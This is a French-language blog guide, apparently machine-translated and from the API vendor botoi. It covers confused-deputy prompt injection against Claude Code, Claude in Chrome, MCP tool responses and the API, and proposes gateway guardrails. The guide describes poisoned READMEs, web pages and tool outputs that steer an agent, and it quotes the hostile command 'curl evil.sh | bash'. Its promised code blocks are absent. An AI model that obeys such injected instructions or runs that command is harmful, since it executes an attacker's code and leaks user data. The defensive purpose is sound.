Aller au contenu
Guide

Claude confus-matrice d'audit adjoint : 4 angles morts, 3 garde-fous

| 8 min read

Quatre équipes de recherche ont publié les résultats de l'injection rapide de Claude entre le 6 et le 7 mai 2026. Une matrice d'audit mappant chaque angle mort à un garde-corps en béton (vérification d'URL, analyse PII, liste d'autorisation de shell) que vous pouvez envoyer cette semaine.

Security audit checklist representing Claude confused-deputy guardrails
Photo by Towfiqu barbhuiya on Unsplash

Entre le 6 et le 7 mai 2026, quatre équipes de recherche distinctes ont publié des résultats sur l'invite Claude injection. La plupart des reportages les ont traités comme trois histoires différentes. C'est la même histoire : un problème d'adjoint confus où Claude exécute des actions pour le compte d'un attaquant qui contrôle contenu non fiable dans sa fenêtre contextuelle.

Un README dans un dépôt cloné peut exécuter des commandes shell via Claude Code. Une page Web dans Claude dans Chrome peut convaincre l'agent de récupérer les URL des attaquants. Une réponse de l'outil MCP peut injecter des instructions auquel obéit le prochain appel d’outil. Le modèle fait ce qu’on lui dit ; le problème c'est le modèle Je ne peux pas dire qui raconte.

Défenses partielles des vaisseaux anthropiques (demandes d'autorisation dans Claude Code, confirmations d'action dans Claude dans Chrome). Le reste est à vous. Voici la matrice d'audit qui mappe chaque angle mort à un un garde-corps en béton et une vérification API en un seul appel que vous pouvez déposer dans votre passerelle MCP dès aujourd'hui.

Les quatre angles morts

Surface Vecteur d'attaque Qu'est-ce qui court Garde-corps natif
Claude Code README empoisonné, paquet postinstall, ou git commit corps Commande Shell, écriture de fichier, git push Invite d'autorisation
Claude dans Chrome Instructions de page Web déguisées en demandes d'utilisateurs Cliquez, soumettez le formulaire, suivez le lien Confirmation des actions
Claude Bureau + MCP La réponse de l'outil contient des instructions pour le prochain appel Appel d'outil MCP enchaîné, lecture de fichier, récupération réseau Boîte de dialogue de consentement à l'outil
API tool_use Chaîne non fiable dans un bloc de résultats d'outil Quoi que décide le prochain tour Aucun par défaut

Chaque garde-corps natif détecte le cas évident (une commande shell que l'utilisateur n'a pas demandée) et il manque le subtil (une boucle "inoffensive" pour un hôte sosie que l'utilisateur n'a jamais vu). Le correctif Il s'agit d'une défense en profondeur au niveau de la couche d'outils, et non au niveau de la couche d'invite.

Garde-corps 1 : phishing : vérifiez chaque URL touchée par l'agent

L'escalade de confusion la plus courante est « visitez cette URL et dites-moi ce qu'elle dit ». Le L'URL appartient à l'attaquant. Les données que l'agent lit ensuite sont désormais ses entrées. Exécuter un phishing vérifiez chaque URL que l'agent n'a pas vue dans l'invite utilisateur d'origine :

Un exécutable brut hébergé sur un Gist anonyme sans validation épinglée est un classique chaîne d’exécution d’injection rapide vers le shell. Le verdict revient en moins de 100 ms ; vous cachez par Hachage d'URL pendant 10 minutes ; vous abandonnez les appels d'outils dont le verdict est autre chose que clean.

Garde-corps 2 : PII et analyse secrète sur chaque réponse de l'outil MCP

La deuxième escalade est l’empoisonnement de la réponse à l’outil. Un outil MCP renvoie un blob JSON de 4 Ko ; quelque part dans ce blob se trouve une chaîne d’instructions. Claude lit le blob en entier et l'instruction l'emporte. Le le blob peut également divulguer des informations d'identification récoltées ailleurs, qui se retrouvent ensuite dans le raisonnement du modèle. trace et vos journaux de conversation.

Empêchez la réponse de l'outil d'atteindre le modèle si elle contient des informations d'identification en direct. Rédiger des e-mails et les téléphones à moins que l'utilisateur ne les demande. Traitez chaque serveur MCP comme non fiable par défaut ; vous Je ne sais pas qui a empoisonné la source de données en amont.

Garde-corps 3 : listes autorisées d'hôtes et de shell durs au niveau de la passerelle

La troisième escalade est celle qui mord les entreprises : un agent qui élargit tranquillement ses atteindre. Un README convainc Claude Code de se présenter curl evil.sh | bash "pour la configuration." Un La page Web convainc Claude dans Chrome de soumettre un formulaire sur un domaine similaire. Les deux attaques meurent contre une liste blanche fixe :

La liste blanche est ennuyeuse. Le but est d’être ennuyeux. Chaque action qui échappe à la liste verte soit échoue immédiatement ou fait apparaître une invite que l'utilisateur doit lire. L'agent reste utile à l'intérieur du bac à sable et inoffensif à l'extérieur.

La passerelle MCP de 60 lignes qui les connecte ensemble

Les trois garde-corps résident dans une fonction middleware située entre Claude et chaque MCP serveur. Il extrait les URL des réponses de l'outil, les vérifie par rapport à un ensemble d'hôtes de confiance plus un liste autorisée de session, exécute une analyse PII et renvoie une décision de blocage structurée à l'application hôte peut faire surface à l'utilisateur :

L'ensemble d'hôtes de confiance contient vos propres API. La liste d'autorisation de session commence vide et s'agrandit à mesure que l'utilisateur approuve explicitement les hôtes pendant la session. La mise en cache maintient le chèque effectivement gratuit pendant répéter les URL (pensez à la pagination, aux tentatives, à la même page de documentation lors des appels d'outils).

Si vous ne pouvez pas encore exécuter une passerelle, utilisez la version bon marché : enregistrez chaque URL et chaque commande shell l'agent propose à un magasin structuré et alerte sur tout ce qui touche un hôte que vous n'avez pas connu préautoriser. La détection sans prévention ne vaut rien non plus.

Où cela s’inscrit dans une posture de défense en profondeur

La matrice d'audit ne remplace pas le propre travail d'Anthropic. C'est la couche que vous contrôlez. Un répartition judicieuse :

  • Anthropic est propriétaire du modèle : robustesse d'injection rapide, hiérarchie d'instructions formation, comportement de refus.
  • Vous êtes propriétaire de la surface de l'outil : Validation d'URL, nettoyage des informations personnelles, hôte et shell listes autorisées, inventaire du serveur MCP.
  • Votre IdP possède l'identité : jetons de courte durée pour l'agent, par session audit, séparez les informations d’identification de l’utilisateur humain.

Sautez n’importe quelle couche et le prochain rapport d’adjoint confus inclut votre incident. La recherche des 6 et 7 mai est un aperçu gratuit de ce que chaque équipe doit livrer avant que cela ne devienne un cycle d'actualités trimestriel.

Points clés à retenir

  • Quatre angles morts, une cause profonde. Claude traite chaque jeton comme potentiellement porteur d'instructions. Un contenu non fiable en contexte est un vecteur d’action et non une lecture passive.
  • Vérification du phishing d'URL sur chaque URL proposée par l'outil. Un appel API, 100 ms, mis en cache. Supprime la chaîne d’escalade d’injection rapide la plus courante.
  • Analyse PII sur chaque réponse de l'outil MCP. Bloque l'exfiltration des identifiants via l'outil entraîne un empoisonnement et garde les secrets hors des journaux de conversation.
  • Listes autorisées strictes à la passerelle. Les commandes Shell et les listes autorisées d'hôtes tuent le escalade « élargir discrètement la portée ». Ennuyeux, fini, efficace.
  • Division de la défense en profondeur. Anthropic est propriétaire du modèle, vous êtes propriétaire de la surface de l'outil, votre IdP possède l’identité. Sautez une couche et la prochaine goutte de recherche vous nomme.

Botoi exposes /v1/phishing/check, /v1/pii/detect, /v1/url-metadata, et environ 200 points de terminaison supplémentaires à usage unique derrière une clé API avec 5 req/min gratuits. Connectez-les à votre passerelle MCP ou appelez-les depuis Claude Code lui-même via le serveur MCP botoi. Parcourez le documents interactifs pour commencer.

FAQ

Quel est le problème Claude confus-adjoint ?
Une attaque adjointe confuse se produit lorsqu'un processus privilégié (Claude Code, Claude dans Chrome) exécute des actions pour le compte d'un attaquant qui contrôle une partie de ses entrées. Entre le 6 et le 7 mai 2026, quatre équipes de recherche ont publié des résultats montrant que Claude peut être amené à exécuter des commandes shell, à exfiltrer des données ou à visiter des URL d'attaquants lorsqu'un contenu non fiable (un README, une page Web, une réponse d'un outil MCP) contient des instructions qui ressemblent à des demandes d'utilisateurs.
Quelles surfaces Claude sont concernées ?
Claude Code (agent CLI lisant les fichiers de dépôt), Claude dans Chrome (agent de navigation lisant des pages Web), Claude Desktop avec des serveurs MCP (les réponses des outils peuvent contenir des instructions) et l'API lorsque les résultats de tool_use contiennent des chaînes contrôlées par l'attaquant. Le problème fondamental est le même dans les quatre : Claude traite chaque jeton dans son contexte comme potentiellement porteur d'instructions.
Anthropic expédie-t-il des garde-corps pour cela ?
Oui, partiellement. Claude Code dispose d'un système d'autorisation pour les écritures shell et fichiers. Claude dans Chrome a une couche de confirmation d'action. Ni l’un ni l’autre n’empêche un attaquant déterminé d’enchaîner une injection rapide avec l’ingénierie sociale. La couche de défense en profondeur vous appartient : validez chaque URL proposée par l'agent, analysez chaque réponse d'outil à la recherche d'IOC et limitez le rayon d'explosion au niveau de la passerelle API.
En quoi est-ce différent d’une injection rapide régulière ?
L’injection d’invite classique se termine au texte de sortie. Un adjoint confus se termine à l'action : une commande shell s'exécute, une URL est récupérée, un webhook se déclenche, l'argent bouge. Le correctif doit se trouver là où les actions se produisent (la couche d'outils), et non là où le texte est généré (le modèle). C’est pourquoi les proxys de garde-fou et la validation d’URL sont plus importants que le renforcement rapide.
Quel est le minimum que je dois ajouter cette semaine ?
Trois choses. Une vérification de phishing d'URL avant que l'agent récupère ou crée un lien vers un domaine qu'il n'a pas vu dans l'invite de l'utilisateur. Une analyse PII et secrète de chaque réponse de l'outil MCP avant qu'elle n'entre dans le contexte de Claude. Et une liste autorisée stricte de commandes shell ou d'hôtes HTTP au niveau de la couche passerelle. Chacun est un appel API et un bloc de configuration.

Commencez a construire avec botoi

150+ endpoints API pour la recherche, le traitement de texte, la generation d'images et les utilitaires pour developpeurs. Offre gratuite, sans carte bancaire.